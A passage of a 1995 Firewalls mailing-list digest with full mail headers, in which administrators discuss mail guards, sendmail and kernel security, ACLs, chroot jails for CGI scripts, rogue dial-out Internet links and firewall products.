or keyboard port). It functions with most WINSOCK based software. The reason I say most is because they have written their own WINSOCK.DLL that talks IPX instead of IP. It is a great solution for some Novell sites but I'm not sure about performance at big sites. This doesn't do much for sites that are running IP everywhere and need to ensure software compatibility from many different platforms but it is a nice product in the Novell market. -------------------------------------------------- Steve Moubray DCC, Inc. 10 2nd Street NE, Minneapolis, MN 55413 (612) 378-4469 Fax (612) 378-4401 smoubray@dcc.com http://www.dcc.com/ From firewalls-owner Thu Sep 14 17:10:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA09283 for firewalls-outgoing; Thu, 14 Sep 1995 16:26:43 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA09251 for ; Thu, 14 Sep 1995 16:26:36 -0700 Received: from pm1-12.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA22975; Thu, 14 Sep 95 18:24:43 -0400 Date: Thu, 14 Sep 95 18:24:43 -0400 Message-Id: <9509142224.AA22975@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Rick Smith From: frankw@in.net (Frank Willoughby) Subject: Re: Secure version of Sendmail Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >On the SNS Mail Guard the government evaluated the whole thing >including the networking and application software. The implication in the above statement is that the Mail Guard functions as a firewall. Not True. The SNS Mail Guard does *not* function as a firewall. It has another purpose. I was told by a salesman who represented the Sidewinder that it was blessed by the gov't powers-that-be as *the* gov't sanctioned firewall. Hogwash. This was a gross mis- representation of the product that took some time and research to unearth. Sorry, that I can't give out further details, but I will vehemently oppose any claims that the Mail Guard is a firewall - Internet or otherwise. I was taken in by this hype (at first), and I will do my best to prevent the same from happening to others. Sorry about the tone of this letter, but gross mis-representation of a product gets my dander up. There many good firewall vendors out there. It isn't necessary to mis-represent a product in order for it to sell - particularly in the (justified) paranoia of CEO's & CIO's who break into a cold sweat at the thought of doing business on the Internet. Stick to the truth & a customer will always listen to what you have to say. This letter wasn't intended as a flame or a personal attack or anything. I was just trying to correct a well-publicized myth and hope I succeeded to a small degree. Best Regards, Frank > >Rick. >smith@sctc.com secure computing corporation > > > From firewalls-owner Thu Sep 14 18:32:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA15880 for firewalls-outgoing; Thu, 14 Sep 1995 18:22:24 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA15873 for ; Thu, 14 Sep 1995 18:22:20 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id UAA01900 for GreatCircle.COM!firewalls; Thu, 14 Sep 1995 20:18:00 -0500 Received: by ris1.nmti.com (smail2.5) id AA18914; 14 Sep 95 18:01:23 CDT (Thu) Received: by sonic.nmti.com; id AA11925; Thu, 14 Sep 1995 18:28:05 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9509142328.AA11925@sonic.nmti.com.nmti.com> Subject: Re: Firewall off Mortal Kombat XIV To: william.wells@damark.com (william.wells) Date: Thu, 14 Sep 1995 18:28:05 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9509141817.AA20648@damark.com> from "william.wells" at Sep 14, 95 01:12:00 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1089 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > As an example, it amazes me that UNIX, which predates some > proprietary systems, STILL doesn't understand what a labeled tape is > and is unable to automatically associate which of several jobs wants > to use a labeled tape which was just mounted on any drive. Any operations > manager who deals with UNIX systems would love to get that. On the other hand, I've beat myself against the wall on systems that support labelled tapes trying to get them to read a foreign tape without messing with the data. Or even get them to accept a foreign tape at all. UNIX has a solid layered I/O system for disks... you just need to do the same thing for tapes and you'll be set. Just don't get rid of rmt when you create mt/label... > So, put security in the kernel: hopefully it will work right. Split > privileges into more than "root" or "not-root"; allow ACLs, etc. Maybe > it will work properly in a multi-vendor environment. I'm not convinced that ACLs enhance security. They make some things easier, but they can also confuse the hell out of users. Confused users tend to do dumb things. From firewalls-owner Thu Sep 14 21:00:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA19637 for firewalls-outgoing; Thu, 14 Sep 1995 20:45:22 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA19630 for ; Thu, 14 Sep 1995 20:45:18 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id WAA04621; Thu, 14 Sep 1995 22:46:20 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 066920000; 14 Sep 95 23:43 CDT Received: from sctc.com by sccmailhost.sctc.com id 114250000; 14 Sep 95 23:42 CDT Received: from hector.sctc.com (hector.sctc.com [172.17.192.85]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id WAA13551; Thu, 14 Sep 1995 22:42:36 -0500 Received: (from stockwel@localhost) by hector.sctc.com (8.6.12/8.6.9) id WAA12718; Thu, 14 Sep 1995 22:42:33 -0500 Date: Thu, 14 Sep 1995 22:42:33 -0500 From: Ted Stockwell Message-Id: <199509150342.WAA12718@hector.sctc.com> To: Frank Willoughby CC: firewalls@GreatCircle.COM Subject: Re: Secure version of Sendmail Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Date: Thu, 14 Sep 95 18:24:43 > From: Frank Willoughby > Cc: firewalls@GreatCircle.COM > > >On the SNS Mail Guard the government evaluated the whole thing > >including the networking and application software. > > The implication in the above statement is that the Mail Guard > functions as a firewall. Not True. The SNS Mail Guard does > *not* function as a firewall. > > It has another purpose. I was told by a salesman who represented > the Sidewinder that it was blessed by the gov't powers-that-be as > *the* gov't sanctioned firewall. Hogwash. This was a gross mis- > representation of the product that took some time and research to > unearth. [rest of complaint deleted] It is not clear to me what your bone of contention is. SNS is not designed to compete directly against traditional internet firewalls. It does have much in common with more conventional firewalls and the SNS effort had a considerable influence on the design of Sidewinder -- Secure Computing's firewall for the traditional internet firewall market. There is information on our web server (http://www.sctc.com) about the SNS program and the LOCKguard(tm) Standard Mail Guard (SMG). I would suggest people start there when wondering what SNS is and isn't. -- disclaimer: I speak only for myself, etc, etc Ted Stockwell, stockwel@sctc.com, Sidewinder From firewalls-owner Thu Sep 14 21:02:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA19560 for firewalls-outgoing; Thu, 14 Sep 1995 20:37:25 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA19553 for ; Thu, 14 Sep 1995 20:37:22 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id WAA16836 for GreatCircle.COM!firewalls; Thu, 14 Sep 1995 22:33:52 -0500 Received: by ris1.nmti.com (smail2.5) id AA21735; 14 Sep 95 20:12:09 CDT (Thu) Received: by sonic.nmti.com; id AA18846; Thu, 14 Sep 1995 20:38:40 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9509150138.AA18846@sonic.nmti.com.nmti.com> Subject: Re: Secure version of Sendmail To: mdr@vodka.sse.att.com Date: Thu, 14 Sep 1995 20:38:40 -0500 (CDT) Cc: peter@nmti.com, firewalls@GreatCircle.COM In-Reply-To: <9509141939.AA05853@ig2.att.att.com> from "mdr@vodka.sse.att.com" at Sep 14, 95 03:39:46 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1713 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Yea right, I'm gonna go to the trouble of finding and administering a > class B OS but I don't care enough about security to fix the application > level bugs. You probably won't. The application writers will say "we don't need to check this stuff, the OS will do it for us". Don't tell me they won't... I've been porting code from O/S to O/S over the past 20 years now, and every piece of code is full of assumptions like "memory allocation always succeeds", or "I can pass a pointer to another process", or whatever the handy shortcuts they're used to are. This is more of the same. So sendmail won't be able to break out of the "jail". But it's gotta have privileges to open network connections inside the firewall, so while your B1 system remains uncompromised it's turned from a wall into a door. You'll get some short term security, while you're running apps written for C1 under B, but the application writers will get lazy. They always do. The code I gave you is an example. The guy who wrote it said "hey, the www server is running unprivileged. I'm using shadow passwords. What can they do?" > And you don't see the need for a secure OS undeneath your CGI > scripts? I see a need for secure CGI scripting languages. If the language has no mechanism to run another program, it's a lot safer. If the guy running the system thinks it doesn't matter because it's running in a jail, he's going to screw himself over sooner or later. This is the thing that worries me about Java. Rather than making it a toy language with simple, well-defined semantics (like HTML, for example, or a pure Postscript without any graphics or I/O) they depend on security checks. That seems inherently more dangerous. From firewalls-owner Thu Sep 14 21:30:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA20179 for firewalls-outgoing; Thu, 14 Sep 1995 21:20:31 -0700 Received: from sunthing.sjsinc.com (sunthing.sjsinc.com [140.174.165.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA20170 for ; Thu, 14 Sep 1995 21:20:27 -0700 Received: by sunthing.sjsinc.com Mailer: sendmail (8.6.12/8.6.9) Protocol: Id: VAA25712; Thu, 14 Sep 1995 21:18:38 -0700 Date: Thu, 14 Sep 1995 21:18:38 -0700 From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman) Message-Id: <199509150418.VAA25712@sjsinc.com> To: firewalls@greatcircle.com Subject: Any known security holes in the "vacation" program Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Folks: I'm trying to set up an auto-responder for a couple of mail aliases on my mailhost. For the moment, because I don't really want to get involved with majordomo or any of the other mail list programs, I am using the simple functionality of the "/usr/ucb/vacation" program under SunOS 4.1.x. Given that the .forward file requires a pipe to this program, what are the possible security implications for this setup (i.e., are there any "well known" holes in this program)??? BTW: I have already hard-coded a subject: line in the vacation.msg file and do not, and will not, put any of the variable subsitiutions in it. I have also shut down access to the "mailbots" home directory by any other user, other than root of course. Is there anything else I'm missing??? Regards, b c++'ing u, %-) sjs ------------------------------------------------------------------------------- Stefan Jon Silverman - President SJS Associates, N.A., Inc. 572 Chestnut Street Distributed Systems Architecture & Implementation San Francisco, Ca. 94133 Phone: 415 989 2741 Fax: 415 989 7250 E-mail: sjs@sjsinc.com Cell: 415 519 3494 ------------------------------------------------------------------------------- Weebles wobble, but they don't fall down!!! ------------------------------------------------------------------------------- From firewalls-owner Thu Sep 14 22:30:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA21876 for firewalls-outgoing; Thu, 14 Sep 1995 22:03:26 -0700 Received: from netmail2.microsoft.com (netmail2.microsoft.com [131.107.1.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA21869 for ; Thu, 14 Sep 1995 22:03:23 -0700 Received: by netmail2.microsoft.com (5.65/25-eef) id AA29051; Thu, 14 Sep 95 22:57:38 -0700 Message-Id: <9509150557.AA29051@netmail2.microsoft.com> Received: by netmail2 using fxenixd 1.0 Thu, 14 Sep 95 22:57:38 PDT X-Received: from PRX-01-HUB by nax-01-hub with recvsmtp ; Fri, 15 Sep 1995 05:01:40 GMT X-Received: from syd-02-msg by prx-01-hub with receive; Fri, 15 Sep 1995 05:01:01 GMT X-Msmail-Message-Id: 5AA0A8CE X-Msmail-Conversation-Id: 5AA0A8CE From: Jonathon Tidswell To: firewalls@greatcircle.com, R@lce.org Date: Fri, 15 Sep 95 14:56:29 TZ Subject: WinNT /Win95 ping/tracert (was RE: source routing) X-Msxmtid: syd-02-msg950915040111MTP[01.00.00]000000a1-15801 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Windows NT: trying help ping or help tracert tracert returned nothing. However the online help (winnt.hlp) had entries that elaborated a bit on the help available with ping -? or tracert -? -JonT Disclaim ... ---------- | From: | | Sorry about the changed subject line but I had already deleted a | short thread earlier, someone was asking for a program that could | produce source routed packets to use in testing against a firewall. | While looking around windows 95 I found that traceroute (tracert.exe) | and ping (ping.exe) both claim in their usage blurb to be able to do | loose source routing, ping also claims strict source routing. The | programs aren't in the on-line help and are barely mentioned in the | very thick and so far useless book with the resource kit. My guess is | these came out of windows nt and would presumably be documented | there. Anyone know? | | Ramon | | | | From firewalls-owner Thu Sep 14 23:30:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA23513 for firewalls-outgoing; Thu, 14 Sep 1995 23:03:36 -0700 Received: from yarrina.connect.com.au (yarrina.connect.com.au [192.189.54.17]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA23506 for ; Thu, 14 Sep 1995 23:03:29 -0700 Received: (from root@localhost) by yarrina.connect.com.au with UUCP id QAA14248 (8.6.12/IDA-1.6); Fri, 15 Sep 1995 16:01:27 +1000 Received: by junkers.lochard.com.au id AA41538 (5.65c/IDA-1.5); Fri, 15 Sep 1995 15:48:08 +1100 From: Mark Message-Id: <199509150448.AA41538@junkers.lochard.com.au> Subject: Re: wank worm To: frankw@in.net (Frank Willoughby) Date: Fri, 15 Sep 1995 15:48:07 +1000 (E ) Cc: proff@suburbia.net, firewalls@GreatCircle.COM In-Reply-To: <9509112305.AA27141@su1.in.net> from "Frank Willoughby" at Sep 11, 95 07:05:23 pm Content-Type: text Content-Length: 222 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I doubt you want this particular fortune file for your program as the >messages generated by the fortune cookie in the wank worm were obscene >& vulgar. This is Proff we're discussing here.. :) Mark mark@lochard.com.au From firewalls-owner Fri Sep 15 05:30:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA29533 for firewalls-outgoing; Fri, 15 Sep 1995 05:25:09 -0700 Received: from door.netcs.com (door.netcs.com [194.120.74.246]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA29513 for ; Fri, 15 Sep 1995 05:25:02 -0700 Received: from keks.netcs.com [138.199.0.101] by door.netcs.com with SMTP (8.6.10/25-eef) id OAA13258; Fri, 15 Sep 1995 14:23:36 +0200 Received: by keks.netcs.com (5.67a8+/1.2-eef) id AA24804; Fri, 15 Sep 1995 14:23:35 +0200 Message-Id: <199509151223.AA24804@keks.netcs.com> Subject: Japanese firm To: firewalls@greatcircle.com Date: Fri, 15 Sep 1995 14:23:34 +0200 (MEST) From: Oliver Korfmacher X-Mailer: ELM [version 2.4 PL21] Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 124 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anybody knows something about that japanese firm which shakes the Internet recently by sending mail to anybody? Oliver From firewalls-owner Fri Sep 15 06:32:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA01320 for firewalls-outgoing; Fri, 15 Sep 1995 06:16:35 -0700 Received: from linda.fdata.se (linda.fdata.se [159.72.248.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA01301 for ; Fri, 15 Sep 1995 06:15:45 -0700 Received: from WMX.WMDATA.SE (wmx.wmdata.se [164.9.179.100]) by linda.fdata.se (8.6.12/8.6.9) with SMTP id PAA05266 for ; Fri, 15 Sep 1995 15:11:28 +0200 X400-Received: by /PRMD=WMDATAWMX/ADMD=WMDATA/C=SE/; Relayed; Fri, 15 Sep 1995 12:22:11 +0100 Date: Fri, 15 Sep 1995 12:22:11 +0100 X400-Originator: Roberto.Piludu@STO4.wmdata.se X400-Recipients: firewalls@greatcircle.com X400-MTS-Identifier: [/PRMD=WMDATA/ADMD=WMDATA/C=SE/;0012400001536838000002] X400-Content-Type: P2-1988 (22) Content-Identifier: CSI NC V3.0 From: "Piludu, Roberto" Message-ID: <0004A8EE.MAI*/S=WMROPIL/OU=STO4/OU=WMDATA/O=MSMAIL/PRMD=WMDATA/ADMD=WMDATA/C=SE/@MHS> To: "'Firewalls'" Subject: alt. mailsystems Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, we're looking for an alternative to Sendmail. We have a SUN sparc20 on the outside of our firewall, and we want to be able to send mail directly to the SUN, and then from there to the firewall. I've read about smap - is it a good alternative to sendmail in this configuration? Any other products that comes to your minds? TIA Roberto Piludu WM-data Communication From firewalls-owner Fri Sep 15 06:50:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA01960 for firewalls-outgoing; Fri, 15 Sep 1995 06:32:30 -0700 Received: from novell.com (nj-ums.fpk.novell.com [147.2.128.54]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA01953 for ; Fri, 15 Sep 1995 06:32:26 -0700 From: cjc@novell.com To: firewalls@GreatCircle.COM Date: Fri, 15 Sep 1995 09:09 EDT Received: from summit by UMS-hub.novell.com; Fri, 15 Sep 95 09:27 EDT Subject: Re: Rogue Internet connection Content-Length: 4728 Content-Type: text/plain Message-ID: <30597fa10.3c35@chimaera.summit.novell.com> Original-Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We have a similar dial-out setup here where you can connect to the outside through a central modem-pool (with appropriate software to make it look like a local modem for PC's and for Unix workstations). The way we handle this problem is as follows: 1) There's a well articulated corporate-wide policy against connecting to outside networks unless the connection is designed/installed/administered by the appropriate IS&T network security folks. This is perhaps the most important part. 2) There's another well articulated policy that you can't get _any_ modem connection without clearing it through the IS&T security folks, and you're not allowed to use it for something other than what it's approved for (like connecting to the Internet over PPP). Audits are done on this (sometimes). 3) Here in Florham Park, all our computer-center servers can connect through the outbound modem pool, but only for simple "cu" type sessions. 4) For people wishing to connect outbound through the modem pool from their PC's or Unix workstations, see # 2. Yes, there definitely are ways to get around this, but at least there's a pretty good audit trail and a definite set of policies saying something to the effect that if you're bad we'll fire you, burn your house, kill your dog, video tape the whole thing, and show it to all your fellow employees as a reminder. Also, we already have (secure) T1 connections to the Internet in each of our major US sites (and other connections sprinkled throughout the world, too), so it's not like folks need to go behind our back just to surf their favorite WWW site or something. -- Christopher J. Calabrese Network Security Architect Novell Information Services & Technology, Florham Park, NJ cjc@novell.com > DATE: Thu Sep 14, 1995 4:21 pm > SUBJECT:Research WWW > > Until recently I was under the impression that our organization did > not have Internet access. I recently discovered that one > department has established a home grown network link. Forget about > security policies. That won't happen until we crash and burn. > Please evaluate this scenario for me. What are our risks? If the > responses are appropriate for the list, please email directly. > > > A PC was configured to serve modems to the local area > network for dial-out service only, using software from > Synergy Solutions called Modem Assist Plus. This software, > which consists of both a client and server portion allows > for transparent PC communications(COM) port redirection. It > does this by capturing all data intended for the PC's COM > port and bundling it into Netbios messages and sending them > to the Server PC. This data is then unpacked and sent to one > of the attached modems. The server in turn bundles any data > it receives into Netbios messages and sends the data back to > the client. This permits any PC based communication program > to transparently access the modems on the Modem Server. > Requests for modems are queued by the server and users are > notified of the availability of a modem so that they can > either wait in the queue or try to access a modem later. The > client portion of the software is Windows based so that DOS > conventional memory requirements are not a factor. > > Access to the internet is provided through CompuServe Inc.'s > PPP/SLIP access using their WINSOCK.DLL. This WINSOCK is > pre-configured to work properly with CompuServe's PPP/SLIP > servers. All users access the same PPP/SLIP account. > > The modems and server are accessible from 6 A.M. to 6 P.M. > Monday through Friday. The server and modems are on a timer > that cuts the power at all other times. This was done to > dissuade users from abusing the service. > > Currently the system will support four simultaneous > connections. We have purchased a 50 seat network license to > use Netscape Navigator for accessing the World Wide Web, > newsgroups, ftp sites, and email. > > > TIA > > Henry Lemon Opinions expressed are mine > Aristech Chemical Corp. and not those of my employer > 600 Grant St. > Room 930 > Pittsburgh PA 15201 > LEMONH%A1%Aristech_Chemical_Corporation@mcimail.com From firewalls-owner Fri Sep 15 07:00:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA02542 for firewalls-outgoing; Fri, 15 Sep 1995 06:49:41 -0700 Received: from devel.dejong.com (devel.dejong.com [198.235.24.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA02535 for ; Fri, 15 Sep 1995 06:49:30 -0700 From: Chris Tyler To: firewalls@greatcircle.com Date: Fri, 15 Sep 1995 09:48 EDT Subject: Re: ACLs (was Firewall off Mortal Kombat XIV) Content-Length: 1210 Content-Type: text/plain Message-ID: <3059842e0.237f@devel.dejong.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Digressing slightly from firewalling... Peter da Silva writes... > I'm not convinced that ACLs enhance security. They make some things easier, > but they can also confuse the hell out of users. Confused users tend to do > dumb things. The SVR4ES ACLs (also in SVR4.2MP aka UnixWare 2.0X) work very nicely in that the ACL and mode bits work together (i.e., looking at "ls -l" will give you a fair idea of what the access settings are on a file; u is u, g is maximum for anyone else, and o is minimum accessibility). The ACL commands are klunky, though. However... I still have trouble getting some users to understand mode bits on their WordPerfect files >:-() I think the most elegant ACL system was the one used in the later versions of Multics, which displayed access permissions about as plainly as they could be shown (--> fewer confused users) and had great granularity. I also like the priviledge and tfadmin portions of SVR4.2MP, which permit specific admin tasks to be delegated to users without giving away full-blown root access. But back to firewalling... Chris Tyler chris@dejong.com Systems Development Manager, Wm. De Jong Enterprises Inc. +1-519-424-9007 / fax +1-519-424-2399 From firewalls-owner Fri Sep 15 07:02:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA02951 for firewalls-outgoing; Fri, 15 Sep 1995 06:59:23 -0700 Received: from mail.swip.net (mail.swip.net [192.71.180.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA02943 for ; Fri, 15 Sep 1995 06:59:11 -0700 Received: by mail.swip.net with UUCP (8.6.8/3.01) id QAA14239; Fri, 15 Sep 1995 16:04:15 +0200 Received: by sendpost with UUCP/PMDF (DECUS UUCP); Fri, 15 Sep 1995 16:01:08 +0100 Received: from SEB008 by seb022 (PMDF V4.3-7 #10220) id <01HVB77IGGB4001UH1@seb022>; Fri, 15 Sep 1995 16:00:55 +0100 Received: by seb008.sebank.se (MX V4.0 VAX) id 15; Fri, 15 Sep 1995 15:54:52 +0100 Date: Fri, 15 Sep 1995 15:54:52 +0100 From: kahar@sebank.se Subject: IBM NetSP To: firewalls@greatcircle.com Cc: kahar@sebank.se Reply-to: kahar@sebank.se Message-id: <0099670C.0F022E40.15@seb008.sebank.se> X-Envelope-to: seunet!greatcircle.com!firewalls MIME-version: 1.0 Content-type: TEXT/PLAIN; CHARSET=US-ASCII Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm looking for comments and experiences with IBMs NetSP, Secured Network Gateway version 1.2. How does it compare to other products like BorderWare and FireWall-1? Katarina Harcus SEB DATA From firewalls-owner Fri Sep 15 07:33:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA03352 for firewalls-outgoing; Fri, 15 Sep 1995 07:03:45 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA03345 for ; Fri, 15 Sep 1995 07:03:42 -0700 From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.6.12/res.host.cf-4.0) with ESMTP id KAA26053; Fri, 15 Sep 1995 10:00:51 -0400 Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.6.12/res.client.cf-4.0) id KAA20314; Fri, 15 Sep 1995 10:00:49 -0400 Date: Fri, 15 Sep 1995 10:00:49 -0400 Message-Id: <199509151400.KAA20314@SPARKY.CF.CS.YALE.EDU> To: cosborn@bbn.com, jst10@octacon.co.uk Subject: Re: WWW - http - cgi_scripts Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Also, consider running your httpd chroot()d so that the CGI scripts have to run in this virtual "jail" as well. It can be a pain (you have to make sure that anything that CGI programs needs -- shared libraries, perl interpreter and library modules -- exists within the chroot()d hierarchy, but it should help to contain a CGI program gone haywire (or one that an external WWW user attempted to trick and hijack). We run a number of CGI programs in a chroot()d environment. - Morrow From firewalls-owner Fri Sep 15 07:33:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04287 for firewalls-outgoing; Fri, 15 Sep 1995 07:26:07 -0700 Received: from mail.ucsd.edu (ucsd.edu [132.239.254.201]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA04278 for ; Fri, 15 Sep 1995 07:26:03 -0700 Received: from juju.adnc.com by mail.ucsd.edu; id HAA25087 sendmail 8.6.12/UCSD-2.2-sun via SMTP Fri, 15 Sep 1995 07:24:40 -0700 Message-Id: <199509151424.HAA25087@mail.ucsd.edu> X-Sender: dschiffrin@popmail.ucsd.edu (Unverified) X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 15 Sep 1995 07:35:01 -0700 To: frankw@in.net (Frank Willoughby) From: David Schiffrin Subject: RE: Xyplex Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Umm dave who? At 04:22 PM 9/13/95 -0400, Frank Willoughby wrote: >Dave, > >My mail to you bounced. Your gateway didn't like the address you >supplied. E-mail me & I'll reply. > >Best Regards, > > >Frank > > > -------------------------------------------------------------------------------- "Sometimes you get the blues because your baby leaves you. Sometimes you get'em 'cause she comes back." --B.B. King David Schiffrin dschiffrin@ucsd.edu Please note address change....NOT daves@ucsdext.ucsd.edu, NOT dschiff@ramapo.edu NOT daves@sd.microage.com and NOT daves@excalib.com and also NOT elvis@*.* OR for that matter daves@elvis* From firewalls-owner Fri Sep 15 07:34:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA03182 for firewalls-outgoing; Fri, 15 Sep 1995 07:01:59 -0700 Received: from kgbvax.network.com (kgbvax.network.com [129.191.202.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA03152 for ; Fri, 15 Sep 1995 07:01:51 -0700 Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id IAA18920; Fri, 15 Sep 1995 08:58:05 -0400 Date: Fri, 15 Sep 1995 08:58:05 -0400 From: Ted Doty Message-Id: <199509151258.IAA18920@kgbvax.network.com> To: smith@sctc.com, firewalls@greatcircle.com Subject: Re: Firewall off Mortal Kombat XIV In-Reply-To: Mail from 'Rick Smith ' dated: Thu, 14 Sep 1995 11:49:14 -0500 Cc: smith@sctc.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I appologize in advance for a somewhat lengthy posting. Rick Smith writes: > > Ted Doty writes: > > >developers, then The Right Thing To Do is to put general security hooks in > >the kernel. > > Put not your faith in silver bullets, and certainly not in general > security hooks in a kernel. To be useful, the kernel would have to > anticipate everything about every application and provide a direct and > simple way to represent the security policy any application might ever > need. Putting faith in silver bullets makes you an instant Security Pinhead. However, this is a different thing. If you're trying to make an impermeable security barrier for your organization, then you've set yourself with quite a challenge. ;-) If, on the other hand, you are trying to establish a reasonably robust set of protections that will keep out all but the uebercrackers, than you can make a really good start with this approach. The fundamental assumptions of this are: 1. Applications are, and will remain, buggy (in unanticipated and probably impossible to anticipate ways). 2. We're stuck with our old applications, and attempts to forbid their use will cause user rebellion, either overt (getting your butt fired, Mr/Ms Security Weenie) or covert (dial-up PPP). 3. What we're most concerned about is preventing anonymity, because if we can do a decent identification of friend or foe, we remove much of the "hard stuff" from our firewall. 4. Anonymity can only be prevent with good authentication, which means crypto. ortunately, there's a standards-based approach that looks like it will bear fruit, so we don't have to be stuck with vendor foo's proprietary crypto solution [don't get me wrong ... I'd LOVE it if everyone rushed out and bought up NSC's DPF. Works Great, Lasts A Long Time. But now, back to reality]. This is not a magic bullet, just a tool to prevent anonymity from arbitrary Internet locations. 5. Access control is most of what remains (at least of what is easy to do). Again, there are widely-deployed, public-domain solutions (like TCP Wrappers) that everyone can get their hands on. Set them up to allow only particular access from external sources, and you handle most applications other than sendmail [I'm about ready to throw up my hands on sendmail ...]. Again, no magic bullet here, simply the prudent use of available tools. 6. Double check everything. Audit trails are your friend, and there are lots of ways to collect them (and even analyze them!). This will tell you when something breaks (which it will). You can compare audit logs from hosts with logs of what's crossed the net, so it becomes doubly hard for an attacker to cover his/her tracks. Again, no silver bullet, just the prudent use of 1970s technology. ;-) 7. You're never secure. Ther eis no magic box that will protect you, and even the protections listed here probably won't. What they should do is tell you when you've been had, so you can take approapriate action (like blocking the latest new hacker attack or firing the guy in engineering that keeps hacking into the accounts receivable database). > Ergo, a bad enough mistake in the application will still yield a > vulnerability regardless of how tough the kernel is. You have to You have to expect that the software on your workstation (both kernel and application) will remain basically wretched, from a security point of view. The issue then, is: how to mitigate this? I still maintain that it's a much more effective use of vendor's development time and system administrator's time to implement as much as possible in the kernel, rather than trying to do a "Security-Enhanced Foo Protocol". > balance responsibility for security between the application and the > kernel. Neither can do the job alone. A boneheaded developer can > implement an application with security holes just as effectively on a > highly secure platform as on a DOS PC. Or keep out the outsiders, and trust that the insiders won't mess with you too often, but audit the access to make sure that they don't. Look, I'd LOVE to have application developers spend real brain-sweat on security, but even if they did, you're still stuck with holes in libc (all right ... who out there has actually gone through all the library routines?). Somewhat getting back to (what I think was) Marcus' original point, we probably CAN'T implement what we've all been considering to 